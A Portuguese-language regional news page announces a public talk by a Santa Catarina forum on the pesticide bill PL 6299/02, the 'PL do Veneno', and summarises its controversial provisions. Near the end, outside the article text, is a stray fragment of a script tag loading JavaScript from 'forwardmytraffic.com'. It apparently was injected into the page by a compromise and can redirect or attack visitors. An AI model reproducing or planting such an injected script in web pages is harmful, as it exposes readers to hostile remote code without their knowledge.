InícioDestaqueFórum de combate aos agrotóxicos debate PL do veneno

Fórum de combate aos agrotóxicos debate PL do veneno

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...
Proposta sugere que agrotóxicos somente sejam proibidos quando apresentem “risco inaceitável”.

O Fórum Catarinense de Combate Aos Impactos dos Agrotóxicos e Transgênicos (FCCIAT) promoverá uma palestra para debater os pontos polêmicos do Projeto de Lei 6299/02, também conhecido como “PL do Veneno”.

 

 

O texto já foi aprovado nas comissões especiais da Câmara dos Deputados e está pronto para ser discutido em plenário. A palestra será ministrada durante reunião plenária do Fórum, na quarta-feira (24/10), a partir das 14 h no auditório do Ministério Público de Santa Catarina (MPSC).

 

 

As mudanças propostas no PL envolvem o uso, controle, registro e fiscalização dos agrotóxicos. O texto prevê alteração da nomenclatura de agrotóxico para defensivos fitossanitários. Se aprovado, o PL permitirá também a venda de agrotóxicos sem receita, em algumas situações, além de dar ao Ministério da Agricultura poder absoluto para autorizar a venda de um agrotóxico. Hoje, é necessária também aprovação da ANVISA e do IBAMA. O projeto de lei proíbe a comercialização apenas dos agrotóxicos que apresentem “risco inaceitável”, dando brecha para muitos produtos nocivos.

 

 

O palestrante será Cleber Adriano Rodrigues Folgado, autor da obra ”Direito e Agrotóxico: Reflexões críticas sobre o sistema normativo” e integrante do Fórum Nacional de Combate aos Impactos dos Agrotóxicos. O evento é aberto ao público e ao acompanhamento da imprensa.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.